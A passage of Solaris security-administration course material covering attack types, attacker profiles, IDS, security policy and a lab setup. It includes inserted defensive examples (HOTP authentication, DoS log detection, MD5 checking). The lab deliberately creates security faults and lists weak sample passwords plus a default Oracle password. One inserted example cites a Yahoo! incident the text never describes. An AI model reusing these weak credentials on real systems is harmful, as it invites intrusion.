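        # ahead, then advance past it so the same code can never be reused.
        for c in range(rec["counter"], rec["counter"] + self.LOOKAHEAD):
            if hmac.compare_digest(hotp(rec["token_secret"], c), code):
                rec["counter"] = c + 1
                self._log(name, "ok")
                return True
        self._log(name, "bad or replayed code")
        return False

    def _log(self, name, outcome):
        self.audit.append((name, outcome))


# RFC 4226 test key (Appendix D); constructed user data below.
RFC4226_TEST_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    auth = Authenticator()
    auth.enrol("alice", "correct horse battery", RFC4226_TEST_SECRET)
    code = hotp(RFC4226_TEST_SECRET, 0)
    print("first use :", auth.authenticate("alice", "correct horse battery", code))
    print("replay    :", auth.authenticate("alice", "correct horse battery", code))
    print(auth.audit)
```

The audit list plays the role the C2 level assigns to authentication events: each failed or successful attempt is recorded with its reason, which is what an administrator needs in order to notice the password-guessing and stolen-code scenarios the bullet list describes.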


Authorization

Authorization ensures that:

● Authorized people can accomplish what they are authorized to do

● Unauthorized people cannot do what they should not do

Authorization is enforced by access control and confidentiality, which:

● Grants or denies access to data

● Restricts actions

● Controls who has access to what

● Provides assurance that sensitive data remains undisclosed

Examples of mechanisms that implement access control and enforceconfidentiality are:

● File and directory permissions

● Network connections and trusted hosts, where the host, all users ofthe host, and the network connection to the host, are implicitlytrusted as secure


● Distributed file system shared access controls

● EEPROM security mode settings

● Encrypted data


Types of Security Attacks

Your systems can be attacked in many ways and for many reasons. Attacks are classified so that you can understand the types of measures that must be taken to prevent or mitigate them.

Fraud and Theft

Flaws in electronic financial and commercial systems provide thepotential, and sometimes the irresistible urge, for criminal attack.Financial systems lose millions of dollars each year because of hacking,and techniques become more effective despite the fact that security alsobecomes more effective. Systems dealing with money (in any form)require an increased security focus because they are likely to receivepersistent attacks.


Information is also stolen because it can have significant monetary value to a competitor or enemy. Intellectual property prompts attacks for the same reason. The concern with intellectual property is providing access to proprietary data while maintaining control and receiving appropriate compensation, rather than keeping sensitive data private.

Terrorism and Sabotage

While fraud is primarily restricted to financial systems, any system might be attacked by terrorists or by an employee looking to sabotage a system for revenge. Revenge or malice is usually the motive for attacks of this kind.

Viruses, designed to cause damage to someone else’s property, are usuallyof this type. Sometimes the virus is targeted against a particular firm;sometimes the hacker is looking for maximum disruption to as manyorganizations as possible.

Bombs, or bomb threats, are another type of destructive attack. Becausemodern distributed systems are heavily dependent upon networking, theactual computer installation might not be the target; the networks are alsovulnerable. Network cables and telecommunications equipment are farmore accessible than computer data centers.

Note – An installation that could be subjected to serious threat from a terrorist attack requires a significant amount of physical as well as electronic defense. The discussion of how to defend against such a threat is beyond the scope of this course.

Sabotage by disgruntled employees can be difficult to prevent, especiallyif the person involved is in a position of trust. Techniques and tools in thiscourse can help to prevent the majority of sabotage attacks caused bymalicious individuals but these tools cannot entirely prevent trusted usersfrom sabotaging a system.

Privacy Violation

Privacy violation comes in two forms: targeted attacks, which can lead toidentity theft, and data harvesting.


Targeted Attack

In a targeted attack, the attacker wants to know everything about anindividual, company, or organization. Identity theft is using thatinformation illegally to impersonate the individual.

As more systems use electronic identification, identity theft is becomingmore common. Computer security helps protect information, whichmakes privacy violation harder. However, not all information is storedonline, so you must pay attention to hard and soft media, and ensure thatprintouts and backup media are also kept secure.

Data Harvesting

Data harvesting is the process of collecting names of people who might besusceptible to illegal scams. For example, an attacker might want to findall the widows age 70 or older, with one or more pets, and with more than$10,000 in the bank, in order to sell them a non-existent plot in a petcemetery.

Data harvesting is heavily automated because multiple databases areaccessible from the Internet. This automation is, however, also the key topreventing data harvesting. The process is only worthwhile if informationcan be easily obtained. Good computer security and moderate levels ofcryptography can protect against data harvesting.

Note – In many countries, data protection regulations define a citizen’srights to privacy and determine how they can access personal informationstored on computer systems. If your company operates in one of thesecountries, you must incorporate the data protection regulations in yoursecurity policy. If you fail to do so, your company might be prosecuted.

Publicity Attacks

Publicity attacks are designed to attract attention. While publicity attacksare usually not illegal or even directly damaging, they can cause a greatdeal of embarrassment and a loss of credibility. For example, in 1995,Berkeley graduates broke the Netscape™ Navigator encryption scheme.They did not exploit the information directly; they called The New YorkTimes, which damaged public confidence in Netscape™.


These attacks are often spread by individuals with time to spare. Do notunderestimate these hackers because they are often highly skilled andlooking for publicity, so the bigger the target the better. Your systemsmust be completely intruder proof to defeat these kinds of attacks.

Denial of Service

A Denial of Service (DoS) attack is designed to stop something fromworking. It can be a type of publicity attack, or the prelude to a criminalattack. In the latter scenario, the criminal is hoping to either directlydamage your security or get you to relax your security while you sort outthe original DoS problem.

Networks are a particular target for DoS. Huge amounts of network trafficcan be generated by automating low level Transmission ControlProtocol/Internet Protocol (TCP/IP) message protocols. This becomes aDoS attack on a poorly defended network.

It is often easier for an attacker to disrupt an operation than it is for themto gain access. Attacks of this kind appeal to malicious people who revelin the sense of power that DoS attacks provide them.

UNIX provides minimal protection against many DoS attacks and theemphasis must be to prevent attackers from getting into a position wherethey can instigate a DoS attack.
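Since UNIX itself gives little protection once a flood is under way, the practical defence is to notice it early from the traffic you already log. The following Python script is an added example, not part of the course material: it reads constructed request-log lines (timestamp, source address, request), finds the largest number of requests any single source made within a sliding window, flags sources above a per-source threshold, and separately reports a distributed flood when many sources together exceed an aggregate rate, which is the pattern in the Yahoo! incident above, where no single one of the 50 addresses need look extreme on its own. The log format, addresses (RFC 5737 documentation ranges) and thresholds are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def parse_log(lines):
    """Yield (timestamp, source) from constructed lines of the form '<ISO time> <ip> <request>'."""
    for line in lines:
        parts = line.split(maxsplit=2)
        if len(parts) < 2:
            continue
        try:
            yield datetime.fromisoformat(parts[0]), parts[1]
        except ValueError:
            continue   # malformed timestamp: skip rather than crash the detector


def max_in_window(times, window):
    """Largest number of timestamps that fall within any interval of length `window`."""
    times = sorted(times)
    best = j = 0
    for i, t in enumerate(times):
        while t - times[j] > window:   # slide the left edge forward
            j += 1
        best = max(best, i - j + 1)
    return best


def analyse(lines, window=timedelta(seconds=10), per_source_limit=20,
            aggregate_limit=100, min_sources=5):
    """Return per-source peaks, the sources over the limit, and a distributed-flood verdict."""
    per_source = defaultdict(list)
    for ts, src in parse_log(lines):
        per_source[src].append(ts)
    peaks = {src: max_in_window(ts, window) for src, ts in per_source.items()}
    flooders = {src for src, n in peaks.items() if n > per_source_limit}
    all_times = [t for ts in per_source.values() for t in ts]
    aggregate_peak = max_in_window(all_times, window) if all_times else 0
    # Distributed: the total rate is abusive even though it is spread over many sources.
    distributed = aggregate_peak >= aggregate_limit and len(per_source) >= min_sources
    return {"peaks": peaks, "flooders": flooders,
            "aggregate_peak": aggregate_peak, "distributed": distributed}


def build_sample():
    """Constructed log: three ordinary clients plus five sources each sending 40 requests in 20 s."""
    t0 = datetime(2000, 2, 7, 10, 30, 0)
    lines = []
    for k in range(1, 4):
        for s in (0, 20, 40):
            lines.append(f"{(t0 + timedelta(seconds=s)).isoformat()} 198.51.100.{k} GET /index.html")
    for k in range(1, 6):
        for n in range(40):
            lines.append(f"{(t0 + timedelta(seconds=0.5 * n)).isoformat()} 203.0.113.{k} GET /")
    return lines


if __name__ == "__main__":
    report = analyse(build_sample())
    for src in sorted(report["flooders"]):
        print(f"flood source {src}: {report['peaks'][src]} requests in 10 s")
    print("aggregate peak:", report["aggregate_peak"],
          "distributed flood:", report["distributed"])
```

The two thresholds answer different questions: the per-source limit catches a single noisy host and gives you an address to block or rate-limit, while the aggregate limit is what tells you that filtering a few addresses will not be enough and that the upstream filters Yahoo! eventually put in place are the appropriate response.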

Natural Causes and Environmental Influences

Accidental, non-malicious attacks are often forgotten. This categoryincludes events which are not directly caused by people, such as fire,flood, earthquake, electrical failure, and so on.

Note – Scenarios of this kind typically require a disaster recovery policy.Disaster recovery is not covered in this course.


Frequency of Security Attacks

Figure 1-2 shows where attackers are focusing their attentions. Over halfthe attacks (60 percent) involve theft of some kind, either information ormoney. If you work for a business you are probably aware of the addedthreats you face, but everyone should understand that information canhave a significant monetary value and, therefore, needs just as muchprotection as cash.

Although 60 percent of attacks were for financial gain, 40 percent weresimply malicious. Fortunately, attackers who just want to cause damageare likely to be deterred if you implement the additional securitymeasures outlined in this course.

Figure 1-2 Types of Computer Crime


Security Attacks Are Rare – Or Are They?

The U.S. Computer Security Institute (CSI) publishes an annual“Computer Crime and Security Survey.” A recent survey of 550companies and other agencies showed a worrying trend – computer crimeis definitely on the increase.

Highlights of the “2001 Computer Crime and Security Survey” include:

● 85 percent of respondents (primarily large corporations andgovernment agencies) detected computer security breaches withinthe last twelve months.

● 64 percent acknowledged financial losses due to computer breaches.

● 35 percent (186 respondents) were willing and able to quantify theirfinancial losses:

● These 186 respondents reported $377,828,700 in financial losses.

● In contrast, the losses from 249 respondents in 2000 totaled$265,589,940.


● The average annual total over the three years prior to 2000 was$120,240,180.

● As in previous years, the most serious financial losses occurredthrough theft of proprietary information (34 respondents reported$151,230,100) and financial fraud (21 respondents reported$92,935,500).

● For the fourth year in a row, more respondents (70%) cited theirInternet connection as a frequent point of attack than cited theirinternal systems (31%). The number of those citing their Internetconnections as a frequent point of attack rose from 59% in 2000 to70% in 2001.

● Thirty-six percent of respondents reported the intrusions to lawenforcement; a significant increase from 2000, when only 25%reported them. In 1996, only 16% acknowledged reporting intrusionsto law enforcement.

Respondents detected a wide range of attacks and abuses. Here are someexamples of attacks and abuses on the rise:

● Forty percent of respondents detected system penetration from theoutside. Twenty-five percent reported system penetration in 2000.

● Thirty-eight percent of respondents detected DoS attacks. Twenty-seven percent reported DoS in 2000.

● Ninety-one percent detected employee abuse of Internet access privileges (for example, downloading pornography or pirated software, or inappropriate use of email systems). Seventy-nine percent detected Internet abuse in 2000.

● Ninety-four percent detected computer viruses. Eighty-five percent detected viruses in 2000.

Questions were asked about electronic commerce over the Internet. Hereare some of the results:

● Ninety-seven percent of respondents have World Wide Web (WWW) sites.

● Forty-seven percent conduct electronic commerce on their sites.


● Twenty-three percent suffered unauthorized access or misuse withinthe last twelve months:

● Twenty-one percent of those acknowledging attacks reportedbetween two and five incidents.

● Fifty-eight percent reported ten or more incidents.

● Ninety percent of those attacked reported vandalism (sixty-four percent in 2000).

● Twenty-seven percent said that they did not know if there had been unauthorized access or misuse.

● Seventy-eight percent reported DoS on Web sites (sixty percent in 2000).

● Thirteen percent reported theft of transaction information (eight percent in 2000).

● Eight percent reported financial fraud (three percent in 2000).

Understanding Your Attackers

Who are the people who attack computer systems? They can be anyone;they do not even have to have access to a computer if they are intent onsabotage. Typically attackers range from organized crime syndicateslooking to instigate major fraud to bored employees looking for a bit ofexcitement (see Figure 1-3).


Figure 1-3 Perpetrators of Computer Crime


Motivations of an Attacker

Attackers apply a variety of methods, depending upon their motivation.Motivations might include:

● Destruction of data

● Theft of data

● Changing the data

● Just for fun, or the challenge

● As a springboard to other activities


Other Types of Attackers

External attackers are often thought of as being focused and highly skilledhackers, pitting their skills against the systems they are trying to infiltrate.However, such attackers take many other forms, including:

● Script Kiddies who run hacking utilities without understandingunderlying security principles

● Terrorists who damage systems to further their cause

● Criminals looking for commercial gain:

● Individuals

● Organized crime groups

● Employees with malicious or criminal intent:

● Often disgruntled

● Can be in a position of trust


Hackers

Hackers have been described as follows:

“An individual who experiments with the limitations of systems for intellectual curiosity or sheer pleasure.”
[Source: Bruce Schneier, Secrets and Lies (see “Additional Resources” on page 1-3)]

“An expert at a particular program, or one who frequently does work using it or on it; as in ‘a UNIX hacker’.”
[Source: http://tuxedo.org/jargon/html/entry/hacker.html]

“A malicious meddler who tries to discover sensitive information by poking around.”
[Source: http://tuxedo.org/jargon/html/entry/hacker.html]

Hackers are often stereotyped as young, male, and socially on the fringe.Real hackers have considerable expertise, often more than the system’sdesigners, and they have plenty of time in which to attack systems.


Some people differentiate between hackers (the good guys) and crackers(the bad guys). Although hackers might cause little or no damage,trespass is still a crime and no hacker is ultimately a good guy. Hackersalso write hacking tools used by others who would otherwise not havethe expertise to hack your systems.

Hackers exploit weaknesses. Unless you are a particularly attractive target(usually the government or a well known company), a good securityregime will send the hacker looking for an easier target.

Script Kiddies

Script kiddies are users who obtain and use hacking tools withoutunderstanding how the tools work or how to perpetrate system attackswithout the tools.

Terrorists

Terrorists are less interested in obtaining a personal advantage than in inflicting damage upon others. Terrorists use damage to achieve their goals and are often ruthless. They use brute force methods, which should be relatively easy to detect, and they are less interested than other attackers in avoiding detection. Recognition is often its own reward.

Terrorists differ from other hackers, such as virus writers, because they damage systems to further their cause and often target particular organizations. While terrorist attacks do occur, they are unusual and government agencies are the preferred target.

Criminals

Lone criminals are likely to target commercial and financial systems (because that is where the money is). They are often insiders exploiting a known weakness, or outsiders using hacking tools. They are generally inexperienced and often get caught. However, those that do not get caught do cause the bulk of computer-related crime.

Organized criminal groups sometimes get involved in industrial espionage. They generally have a higher tolerance for risk than lone criminals do and can purchase information or bribe individuals to gain access.


Defense against criminals is the same as defense against hackers. Make your system secure and they will seek easier targets.

Employees

Malicious insiders are potentially dangerous adversaries. Because an employee, contractor, or consultant is already inside the firewalls, past the intrusion detection systems, and possibly accessing many systems, an employee can cause a great deal of damage.

Programmers and individuals in positions of trust, such as system administrators, are of particular concern, because they have the expertise to subvert systems and to cover their tracks. Protecting systems against employees is significantly more difficult than protecting systems against outsider attacks. In fact, protecting against all insider attacks might be impossible without causing significant inconvenience to normal business.

Top Enterprise-Wide Attacks

The following is a list of the top security weaknesses in a typical enterprise. While it is not an exhaustive list of security vulnerabilities, you can use this list as a guide to prioritizing your activities:

● Routers – Misconfigured access control lists on routers can allow information leakage through Internet Control Message Protocol (ICMP), Internet Protocol (IP), or NetBIOS, which can lead to unauthorized access to servers.

● Remote Access – Unsecured and unmonitored remote access points provide easy access. Modems are particularly vulnerable. Modem use is declining with the use of Virtual Private Networks (VPNs).

● Trusted Relationships – Excessive use of trusted relationships, such as UNIX .rhosts and Microsoft NT Domain Trusts, can provide unauthorized access to your systems.

● User Accounts – Unnecessary privileged accounts allow more chances for attackers to gain privileged access to your systems.

● Passwords – Weak, easily guessed, and reused passwords can compromise your systems.


● Standard Accounts – Presupplied accounts using standard passwords (such as the Oracle system account, which is installed with a password of manager, and the installer is not prompted to change the default password).

● Software – Outdated, unpatched, or vulnerable software left on your system increases the chances of accidental and malicious misuse. Failure to apply operating system patches on a regular basis is a common cause of weak security.

● Security Policy – Lack of accepted or well-distributed security policies, procedures, or guidelines.

● Sharing Data – Excessive Network File System (NFS) exports or Microsoft NT shares.

● Unauthenticated Services – Running services such as X-Windows that allow keystroke captures.

● Internet Servers – Misconfigured Internet servers, particularly Common Gateway Interface (CGI) scripts behind Web servers and File Transfer Protocol (FTP) servers.

● Firewalls – Misconfigured firewalls can provide access to internal systems.

● Unnecessary Services – Remote Procedure Call (RPC), FTP, Domain Name Services (DNS) and Simple Mail Transfer Protocol (SMTP), and so on can be easily compromised.

● Information Leakage – Some services, such as Simple Network Management Protocol (SNMP), finger, SMTP, telnet, rusers, rpcinfo, and NetBIOS can provide attackers with operating system and application versions as well as users, groups, file shares, and DNS information.

● Inadequate Logging – Detection and monitoring should be done at the host and network level.


Running an Intrusion Detection System

An Intrusion Detection System (IDS) is a type of security tool. Typically, an IDS is a network monitor which scans for suspicious behavior. It is not a substitute for good, proactive security and intruder prevention.


An IDS can alert you to a successful attack or sometimes a failed attempt. A good IDS can:

● Alert you while the attack is still taking place

● Help you track down where the attack is coming from

● Make recommendations on what action to take

Burglar Alarms and Honey Pots

Network burglar alarms and honey pots are forms of IDS. Burglar alarms set off an alarm when events such as the following occur:

● A particular network command is used.

● A dummy network account is activated.

Honey pots are burglar alarms made to look particularly attractive to attackers. Honey pots are often dummy computers or subnets with interesting names. Attackers are attracted to the honey pot, which monitors the hacking activity.


Continuous Monitoring

Security is an ongoing process. Your systems and network should be checked for security attacks on a regular basis. Good logging and auditing processes are essential, but these processes are wasted if you do not check them regularly. Hourly checks might be excessive for most environments, but daily ones are not.

IT system vendors, third-party companies, and individuals provide many tools to help with continuous monitoring. Utilities exist that monitor log files for key events, recognize these events, and respond by emailing or paging administrators so that they quickly become aware of the event.

Running Dummy Attacks

One approach to checking security levels is to run dummy attacks. Use pre-announced attacks to avoid false alarms when administrators detect the attack. Run clandestine attacks to ensure security administrators can respond to an attack when they are not aware that one is taking place.

Third-party companies or individuals can mount attacks to try to detect gaps in your security systems. Specialist security companies are aware of the latest security bulletins and weaknesses. Be sure that you trust any company that checks your security, because the security company then becomes aware of any weaknesses in your IT systems.

Sun Microsystems’ Professional Services offer a range of security auditing services.

Vulnerability Scanners

A vulnerability scanner is an automated program that scans your network for known weaknesses and produces a report that you can use to help fix them. SAINT (formerly SATAN/SANTA) is the best-known vulnerability scanner. See Module 12, “Analyzing Network Services” for more information.


Security Policy

At its simplest, a security policy consists of a description of allowed and prohibited operations. This course is about tactics that increase system security. Your security policy should incorporate these tactics.

A security policy can never be static. Instead, it must continuously adapt to new knowledge and situations.

To create a security policy, you must:

● Decide what is and what is not permitted within your computing environment

● Define the limits of acceptable behavior relative to the security of any environment

Before a security policy can be determined, answer the following questions:

● What am I protecting?

● Why am I protecting it?


● What am I protecting it from?

● How much money, manpower, and equipment can I devote to achieve adequate protection?

Proper security policy development requires a risk assessment and a cost–benefit analysis.


Purpose and Use of a Security Policy

The security policy defines what items (buildings, people, job roles, equipment, systems, data, applications, hard copy media, and so on) and environments are valuable, and what steps are necessary to protect them. The security policy makes clear what is covered by the policy and why. You can also include the reasons why items are not covered. It also states who and what is responsible for that protection. Finally, it provides a foundation on which to resolve situations when conflicts or misunderstandings occur.

A security policy must be specific to the type of company and users it is applied to. It should not be just a list of threats to the environment, but a positive statement of standards and guidelines.

The scope of a security policy can be very simple (such as a handout containing guidelines) or it can include detailed manuals and regulations. Administrators, users, and company officials must have guidelines regarding what they should and should not be doing.


Some topics that should be described in a security policy are:

● Password selection criteria and password aging schedules

● Ownership of systems and responsibilities

● Backup schedules and expectations of restoration of lost data

It is also important for you to decide on which of the following paradigms to base your security policy:

● Everything not specifically denied is permitted

● Everything not specifically permitted is denied

Which paradigm you choose is likely to be based on the general level of security required at a site (with the second paradigm being more secure than the first).

Creating a Security Policy

A site security policy is usually a collection of guidelines and procedures, prefixed with a general statement of the organization's security aims. Although you can write a site security policy from scratch, you might prefer to use the handbook written by the Network Working Group, discussed in the following section.

Site Security Handbook – Network Working Group RFC 2196, September 1997

This handbook is a guide to developing computer security policies and procedures for sites that have systems on the Internet. This handbook provides practical guidance to administrators trying to secure their information and services. The subjects covered include:

● Policy content and formation

● A broad range of technical system and network security topics

● Security incident response procedures

This handbook is available from numerous Web sites (see “Additional Resources” on page 1-3).


Using Third-Party Security Tools

To implement your security policy you need several tools. Sun Microsystems provides security tools and services, many of which are covered in this course. In addition, other third-party tools administer security (and are sometimes used to break into systems). Established tools and new tools are covered in security news groups, such as:

● alt.computer.security

● alt.security.*

● cern.security.unix

● comp.security.*

● misc.security

Several Web sites specialize in security, including:

● http://www.sans.com

● http://www.securityfocus.com

● http://www.cert.com


Some of Sun Microsystems’ security pages are:

● http://www.sunworld.com/sunworldonline/common/security-faq.html

● http://sunsolve.sun.com/pub/pub-cgi/sec.Bulletin.pl

Specific companies (or Open Software organizations) have developed some of the tools. These can be found on the appropriate Web sites. Most of the other tools are included in standard archives such as:

● ftp://ftp.cerias.purdue.edu/pub/tools/unix/

● ftp://ftp.csc.ncsu.edu/pub/security/

Several of the commonly used public domain tools have been ported to various versions of the Solaris OE and are available in precompiled System V Release 4 (SVR4) package format from the Sun Web site:

http://www.sunfreeware.com

When a specific tool is discussed during this course, a reference to the appropriate Web site is also included in “Additional Resources” on page 1-3.

Appendix B also includes a list of security tools specific to the Solaris OE, and Appendix C has a list of third-party security tools relevant to this course.

Installation of Third-Party Tools

Most tools are provided in C, C++, or Perl source code format and require compiling and linking for your specific platform. They are generally distributed as tar archives and often compressed using GNU zip (gzip). The gzip program is a standard utility provided with the Solaris 8 OE.

Note – The gzip program must be downloaded from the Sun freeware site and installed for previous versions of the Solaris OE.

All these tools provide instructions and include shell scripts or make files to automate the process. Look for files such as README or INSTALL in the tool’s top-level directory.


These tools are generally installed into a subdirectory under the /usr/local directory. Many of the tools install executable binaries into the /usr/local directory by default (and install the manual pages into the /usr/local/man directory).

Tool installation usually includes following these steps:

1. Download the tool archive.

2. Uncompress the archive.

3. Unpack the archive into the /usr/local directory.

4. Read the tool README files.

5. Follow the instructions in the README files. These instructions might be as easy as running these commands:

# make
# make install

Because these tools are portable, administrators usually use the GNU C++ compiler instead of the Sun Workshop Standard compiler. You should download and install the GNU C++ compiler from the Sun Free Software Web site even if you have a Sun Workshop compiler available.

Some tools might be provided as precompiled binaries for popular operating systems (such as the Solaris OE) by the supplier or be available on the Sun Free Software Web site. If so, install those tools using the pkgadd utility.


Security Issues With Third-Party Tools

How do you know that a third-party tool does what it is supposed to do? Can you be sure that the software posted onto the Web is as originally written and has not been modified by someone else?

Using MD5 Digests and Public Keys for Authentication

Many archives include Message Digest 5 (MD5) or similar signing techniques which can validate that the software you download is the software originally provided by the developer. As long as you trust the developer, you can trust the software. Digital certificates and public keys can also increase your trust in the tool developer.
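The digest check described above, as an added example that is not part of the course or of any tool it names: a small shell script that compares a downloaded archive with the digest its developer published, intended to run between the uncompress and unpack steps of the installation sequence. It assumes either md5sum or openssl is installed; the archive and the digests used in the demonstration are constructed.

```shell
#!/bin/sh
# Added example, not from the SC-300 course: check a downloaded tool archive
# against the MD5 digest the developer published before unpacking it.
# Assumes md5sum (GNU) or openssl is available on the host.
# A matching digest only shows the file is the one the developer posted;
# it says nothing about what the code does, so reviewing the source still applies.

# compute_md5 FILE -> prints the 32-hex-digit MD5 of FILE on stdout
compute_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    elif command -v openssl >/dev/null 2>&1; then
        # openssl prints "MD5(file)= <digest>"; the digest is the last field
        openssl dgst -md5 "$1" | awk '{print $NF}'
    else
        echo "compute_md5: no MD5 tool found" >&2
        return 2
    fi
}

# verify_archive FILE EXPECTED -> 0 when FILE's digest equals EXPECTED,
# 1 on a mismatch or unreadable file, 2 when no digest tool is available.
# The published digest may be upper or lower case and padded with whitespace.
verify_archive() {
    file=$1
    expected=$(printf '%s' "$2" | tr -d ' \t' | tr 'A-F' 'a-f')
    if [ ! -r "$file" ]; then
        echo "$file: cannot read" >&2
        return 1
    fi
    actual=$(compute_md5 "$file") || return 2
    if [ "$actual" = "$expected" ]; then
        echo "$file: MD5 OK ($actual)"
        return 0
    fi
    echo "$file: MD5 MISMATCH: expected $expected, got $actual" >&2
    return 1
}

# Demonstration on a constructed file whose whole content is the text "hello";
# MD5("hello") is 5d41402abc4b2a76b9719d911017c592.
SAMPLE=${TMPDIR:-/tmp}/tool-1.0.tar.gz.$$
printf 'hello' > "$SAMPLE"
verify_archive "$SAMPLE" 5D41402ABC4B2A76B9719D911017C592     # prints: MD5 OK
if verify_archive "$SAMPLE" 00000000000000000000000000000000 2>/dev/null; then
    echo "unexpected: a wrong digest was accepted" >&2
fi
rm -f "$SAMPLE"
```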

As a final check, you (or an experienced programmer) can study the source code to see what it actually does. If you are not convinced about a tool’s authenticity, do not use it.

Remove Compilers and Tools After Use

Users can use C and C++ compilers to compile and install their own programs. A malicious user can install hacking tools which might breach the integrity of your system.

You should remove the compilers after you have compiled your software (they can always be reinstalled if they are required again). You can also compile only on one system, then transfer the final tool files to the target system. This is how the Sun Freeware Web site operates. In this case, the tool is packaged as a System V package for ease of distribution and installation.

An alternative approach is to make the compilers executable only by the root user. However, this does not protect you from a user successfully hacking your root account and using the compiler to leave a trapdoor for future use.

Similarly, the tools that you use to check system security can also be used by malicious users to look for security weaknesses. Many tools must be used continuously, but some are used once and rarely again. Remove tools after they have served their purpose, and make sure that the tools are not executable by ordinary users at any time.


Site Policy for Security Tools

The tools used in this course provide a good suite of security enhancement products. They can also attack a system. Many sites have strict rules about the use and installation of these tools. The following examples are real instances of rules or guidelines imposed by some sites:

● Installing password guessing tools (like crack) can result in immediate dismissal.

● Using the SAINT (SATAN/SARA) scanning program on a dial-up line results in the ISP disabling your account for one month with an administration charge for re-enabling it.

● Using network sniffing tools (even official ones like snoop) can result in immediate dismissal.


Warning – Do not use any of the tools described in this course without the permission of the system and network administrators at your location. Do not even download or install the tools without first obtaining the authority to do so.


Exercise: Considering Security Issues

In this exercise, you complete the following tasks:

● Discuss example security attacks

● Discuss your site’s security policy, if you are permitted to do so

● Install software to use throughout this course

Task – Example Security Attacks

Think of an example of security attacks for each of the categories discussed in “Types of Security Attacks” on page 1-21:

● Fraud

● Theft

● Terrorism and sabotage

● Privacy violation

● Publicity attacks

● Denial of service

● Natural causes and environmental influences

Task – Security Policy

Does your site have a security policy? Have you seen it? What sort of security issues does it discuss? Give an example of a security policy or procedure related to your job role.


Task – System Configuration

This task must be completed to configure your workstation for the remainder of the course.

To complete this task, you must install the GNU C++, make utility, tools, and sample data files used for the rest of this course.

The software tools used for this course are usually downloaded from a Web site. To avoid long download times on slow or overloaded networks, all the necessary software is already available on the instructor’s system.

Most of the tasks you perform are done with root privileges. This gives you unrestricted access to the system and the potential to cause irrevocable harm to the Solaris OE. If at any time you are unsure what to do, ask your instructor for assistance.

Note – The instructor provides the host name or IP address and a user account and password for use with the ftp command.

Perform the following steps in the order given:

1. Log in as root and start a shell window if you are using the Common Desktop Environment (CDE).

2. Create a directory for the course software. Download and unzip the required files from the instructor’s workstation using the following commands:

# mkdir -p /usr/local/pkg
# cd /usr/local/pkg
# ftp instructor system
ftp> bin
ftp> cd /usr/local/pkg
ftp> prompt
ftp> mget *
ftp> bye
# gunzip *.gz


3. Although the Solaris 8 OE comes with a standard Perl 5 interpreter, this is not compatible with many of the third-party tools written in Perl (swatch for example). The standard Perl interpreter is designed to work with the Sun Workshop C/C++ compilers, whereas most of the tools you will use are compiled with the GNU C/C++ compiler. You must load a later version of Perl which supports the GNU C/C++ compiler and use it in preference to the perl command in the /usr/bin directory.

4. Install the Perl 5.6 package from the /usr/local/pkg directory:

# pkgadd -d perl-5.6.0-sol8-sparc-local

5. Install the GNU C++ compiler and make utility. This software is in the /usr/local/pkg directory.

6. Add the gcc and make packages to the system using the following commands:

# pkgadd -d gcc-3.0.3-sol8-sparc-local
# pkgadd -d make-3.79.1-sol8-sparc-local

7. Create a symbolic link for the GNU C++ compiler that has just been installed:

# cd /usr/local/bin
# ln gcc cc

8. Configure the standard login profile to include the necessary binary files and manual pages. Modify the /etc/profile file and add the following lines at the end of the profile (before the final trap command):

EDITOR=vi
VISUAL=vi
export EDITOR VISUAL

PATH=/usr/local/bin:/usr/local/sbin:$PATH:/usr/ccs/bin
MANPATH=/usr/share/man:/usr/local/man
export MANPATH

LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib:/usr/local/ssl/lib:/usr/ccs/lib
export LD_LIBRARY_PATH


Note – In this example, the /usr/local/bin and /usr/ccs/bin directories have been added to the standard path. These directories must now have the same security checks and controls applied as the standard system bin directories.

9. If your root account has presupplied login environment files, remove these files:

# rm /.profile /.kshrc

You can customize the Korn shell environment for root if you want.

Warning – It is imperative that the root account has a search path which uses the versions of perl, make, and cc which have been installed in the /usr/local/bin directory. The configuration shown in this exercise ensures that this is true. The Solaris OE has versions of cc in /usr/ucb/bin and /usr/ccs/bin, perl in /usr/bin and make in /usr/ccs/bin. If you use these programs instead of the ones in /usr/local/bin, then some of the downloaded tools (swatch in particular) do not build or run correctly.

10. To simplify tool installation, a shell script called undos is included in the /usr/local/pkg directory. This script uses the unix2dos command to convert one or more plain text files to UNIX format (recursing through directories if required). Copy this script to the /usr/local/bin directory using:

# cp /usr/local/pkg/undos /usr/local/bin

11. Run the script:

# /usr/local/pkg/sc300_setup


This script creates users, creates some security faults, and installs sample log files on your system. When the script runs, you are prompted to set passwords for three user accounts. Table 1-1 shows you which passwords to enter.

Table 1-1 Sample Users and Passwords

User Name    Password
alice        w0nderland (Note use of digit zero)
bob          b0bb0b (Note use of digit zero)
eve          3v3adam


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following are solutions to the exercises. If you have any questions about either the exercises or the given solutions, talk with your instructor.

Example Security Attacks

The following list includes one example of each type of security attack;there are many others.

a. Fraud – Falsifying payroll details to get a higher salary or false expense reimbursement

b. Theft – Buying goods with a false credit card number

c. Terrorism and sabotage – Installing a time bomb into a system

d. Privacy violation – Stealing someone’s credit card details

e. Denial of service – Overloading a DNS server with false requests

f. Publicity attacks – Telling the press about a fault on a site which you have discovered or created

g. Natural causes and environmental influences – A flooded machine room

Security Policy

There are no solutions to this exercise.

System Configuration

There are no solutions to this exercise.


Module 2

Using Solaris™ OE Log Files

Objectives

Upon completion of this module, you should be able to:

● Locate and interpret Solaris™ OE standard log files

● Use log files to form an audit trail

● Configure and use the syslogd daemon

● Configure and use the Solaris OE process monitoring control tools

● Use third-party process monitoring tools

● Configure and use UNIX accounting tools


Relevance


Discussion – The following questions are relevant to understanding the role of logging in a secure Solaris OE:

● How easy is it to track what Solaris OE users are doing or have done?

● What is an audit trail?

● What are the vulnerabilities of an audit system?

Can you:

● Configure the Syslog facility to log system errors or debug messages and notices?

● Configure a centralized logging host?


Additional Resources

Additional resources – The following references provide additionalinformation on the topics described in this module:

● Solaris OE manual pages for acctcom(1M), accton(1M), ckpacct(1M), dodisk(1M), finger(1), kill(1), last(1), lastcomm(1M), lastlog(3), lastlogin(1M), logger(1M), login(1), monacct(1M), pacct(3), prdaily(1M), runacct(1M), sar(1M), shutacct(1M), su(1), syslogd(1M), syslog.conf(3), users(1), utmpx(3), vmstat(1), wtmpx(3), who(1), whodo(1), and w(1).

